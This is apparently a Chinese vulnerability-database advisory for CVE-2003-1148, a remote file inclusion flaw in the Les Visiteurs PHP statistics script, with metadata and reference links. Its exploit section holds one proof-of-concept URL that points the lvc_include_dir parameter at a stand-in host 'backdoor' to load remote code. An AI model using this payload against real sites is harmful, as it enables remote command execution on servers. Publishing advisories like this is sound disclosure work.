Les Visiteurs多个远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1107542 漏洞类型 输入验证
发布时间 2003-10-27 更新时间 2006-11-13
CVE编号 CVE-2003-1148 CNNVD-ID CNNVD-200310-074
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/23302
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200310-074
|漏洞详情
LesVisiteurs是一款站点访问统计脚本。LesVisiteurs多个脚本没有正确处理包含文件参数,远程攻击者可以利用这个漏洞以WEB权限在系统上执行任意命令。LesVisiteurs包含的include/config.inc.php和include/new-visitor.inc.php脚本对用户提交的URL请求缺少充分过滤,提交包含远程恶意文件的参数给'lvc_include_dir'变量,可以以WEB权限在系统上执行任意命令。
|漏洞EXP
source: http://www.securityfocus.com/bid/8902/info

A problem has been reported in the handling of some types of input by Les Visiteurs. Because of this, an attacker may be able to execute arbitrary commands on the system. 

http://www.example.com/path/include/config.inc.php?lvc_include_dir=http://backdoor/
|参考资料

来源:XF
名称:les-visiteurs-file-include(13529)
链接:http://xforce.iss.net/xforce/xfdb/13529
来源:OSVDB
名称:3586
链接:http://www.osvdb.org/3586
来源:SECTRACK
名称:1008011
链接:http://securitytracker.com/id?1008011
来源:BUGTRAQ
名称:20031026LesVisiteursv2.0.1codeinjectionvulnerability
链接:http://archives.neohapsis.com/archives/bugtraq/2003-10/0262.html
来源:BID
名称:8902
链接:http://www.securityfocus.com/bid/8902
来源:OSVDB
名称:2717
链接:http://www.osvdb.org/2717
来源:SECTRACK
名称:1017065
链接:http://securitytracker.com/id?1017065
来源:SECUNIA
名称:10079
链接:http://secunia.com/advisories/10079